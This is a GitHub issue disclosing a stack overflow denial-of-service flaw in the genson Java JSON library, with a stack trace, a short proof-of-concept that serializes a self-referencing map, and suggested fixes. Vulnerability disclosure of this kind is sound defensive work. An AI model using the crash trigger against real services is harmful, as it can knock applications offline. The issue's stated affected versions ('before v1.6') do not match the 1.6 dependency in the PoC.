Stack overflow error caused by genson serialization Map
PoppingSnack opened this issue · 0 comments
PoppingSnack commented
Stack overflow error caused by genson serialization Map
Description
genson before v1.6 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at com.owlike.genson.stream.JsonWriter.beginObject(JsonWriter.java:10)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:642)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
at com.owlike.genson.Genson.serialize(Genson.java:274)
at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
at com.owlike.genson.Genson.serialize(Genson.java:274)
at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
at com.owlike.genson.Genson.serialize(Genson.java:274)
PoC
<dependency>
<groupId>com.owlike</groupId>
<artifactId>genson</artifactId>
<version>1.6</version>
</dependency>
import com.owlike.genson.Genson;
import java.util.HashMap;
public class PoC2 {
public static void main(String[] args) {
HashMap<String,Object> map=new HashMap<>();
map.put("t",map);
Genson genson = new Genson();
genson.serialize(map);
}
}
Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))